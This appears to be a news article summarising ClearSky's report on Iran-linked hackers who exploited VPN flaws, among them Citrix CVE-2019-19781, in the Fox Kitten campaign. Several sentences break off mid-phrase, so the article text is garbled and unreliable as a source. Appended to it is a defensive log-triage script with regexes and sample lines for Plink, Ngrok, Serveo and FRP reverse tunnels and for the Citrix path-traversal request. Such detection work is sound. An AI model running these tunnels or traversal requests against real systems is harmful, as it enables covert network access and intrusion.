The campaign targeted dozens of companies and organizations in Israel and around the world, experts pointed out that the most successful and significant attack vector used by the Iranian hackers was the exploitation of
Iran-linked hackers have targeted companies from different sectors, including IT, Telecommunication, Oil and Gas, Aviation, Government, and Security”
“This attack vector is not used exclusively by the Iranian APT groups; it became the main attack vector for cybercrime groups, ransomware attacks, and other state-sponsored offensive groups,” reads the report published by ClearSky.
“We assess this attack vector to be significant also in 2020 apparently by exploiting new vulnerabilities in VPNs and other remote systems (such as the latest one existing in Citrix). Iranian APT groups have developed good technical offensive capabilities and are able to exploit 1-day vulnerabilities in relatively short periods of time, starting from several hours to a week or two.”
Experts explained that Iranian hackers have focused their interest in 1-day flaws and developed a significant capability in developing working exploits for them that were employed in their
ClearSky confirms that Iranian APT groups in some cases exploited VPN vulnerabilities within hours after their public disclosure.
The investigation Fox Kitten Campaign revealed an overlap, with medium-high probability, between the infrastructure used by the attackers and the one associated
In 2019, Iran-linked APT groups were able to quickly exploit the vulnerabilities
The attacks exploiting the above issues were initially detected at the end of August; more recently, Iran-linked hackers have also employed exploits for CVE-2019-19781, the Citrix ADC VPN flaw, in their attacks.
Attackers exploit the VPN flaws to access the enterprise networks, infect systems with a
After exploiting vulnerabilities in VPN systems to breach the target network, the attackers perform several actions and use multiple tools to maintain a foothold in the network with high privileges.
The threat actors also used legitimate software such as PuTTY, Plink, Ngrok, Serveo, and FRP in their attacks.
The attacks that ClearSky observed as part of the Fox Kitten campaign aimed to gather information on the target networks and plant backdoors, but experts fear that once inside the target infrastructure the hackers could deploy data wipers (such as ZeroCleare and Dustman) in future attacks.
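As an added illustration (not code from the ClearSky report or from this article), the Python script below shows how a defender might screen process-creation and web-server logs for the two behaviours described above: reverse-tunnel invocations of the legitimate tools listed (Plink, Ngrok, Serveo, FRP) and the publicly documented path-traversal request shape associated with CVE-2019-19781 exploitation attempts. The command-line forms, function names and sample log lines are constructed assumptions for this example, not indicators taken from the report.

```python
import re
from typing import Dict, List

# Assumed typical reverse-tunnel invocations of the tools named in the report (constructed here, not ClearSky indicators).
TUNNEL_PATTERNS = {
    "plink_reverse_tunnel": re.compile(r"\bplink(?:\.exe)?\b.*\s-R\s+\d+:", re.I),
    "ngrok_tcp_tunnel": re.compile(r"\bngrok(?:\.exe)?\b\s+tcp\b", re.I),
    "serveo_ssh_forward": re.compile(r"\bssh(?:\.exe)?\b.*\s-R\s+\S+\s+\S*serveo\.net", re.I),
    "frp_client": re.compile(r"\bfrpc(?:\.exe)?\b", re.I),
}

# Publicly documented request shape of CVE-2019-19781 attempts: a traversal from /vpn/ into /vpns/ on Citrix ADC/Gateway.
CITRIX_TRAVERSAL = re.compile(r"/vpn/(?:\.\./)+vpns/", re.I)

def classify_process(cmdline: str) -> List[str]:
    """Names of every tunnelling pattern that a process command line matches."""
    return [name for name, pat in TUNNEL_PATTERNS.items() if pat.search(cmdline)]

def is_citrix_traversal(log_line: str) -> bool:
    """True when a web-server log line carries the CVE-2019-19781 traversal shape."""
    return bool(CITRIX_TRAVERSAL.search(log_line))

def triage(process_lines: List[str], web_lines: List[str]) -> Dict[str, List[str]]:
    """Run both checks and group the matching log lines by finding name."""
    findings: Dict[str, List[str]] = {}
    for line in process_lines:
        for name in classify_process(line):
            findings.setdefault(name, []).append(line)
    for line in web_lines:
        if is_citrix_traversal(line):
            findings.setdefault("cve_2019_19781_attempt", []).append(line)
    return findings

# Constructed sample logs (not real data) to exercise the checks.
SAMPLE_PROCESS_LOGS = [
    r"C:\Tools\plink.exe -N -R 3389:127.0.0.1:3389 user@203.0.113.10",
    r"C:\Users\Public\ngrok.exe tcp 3389",
    r"C:\Temp\frpc.exe -c frpc.ini",
    r"C:\Program Files\PuTTY\putty.exe -load corp-jumphost",  # interactive use, not flagged
]
SAMPLE_WEB_LOGS = [
    '198.51.100.7 - - [20/Jan/2020:10:02:11 +0000] "GET /vpn/../vpns/test HTTP/1.1" 200 0',
    '198.51.100.8 - - [20/Jan/2020:10:03:42 +0000] "GET /vpn/index.html HTTP/1.1" 200 3120',
]

if __name__ == "__main__":
    for finding, lines in triage(SAMPLE_PROCESS_LOGS, SAMPLE_WEB_LOGS).items():
        print(f"{finding}: {len(lines)} line(s)")
```

Matches on these patterns are triage leads, not proof of compromise: the same tools have legitimate administrative uses, so each hit should be checked against the user, host and change records.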
Further technical details on the Fox Kitten Campaign, including indicators of compromise (IOCs), are reported in the analysis published by ClearSky.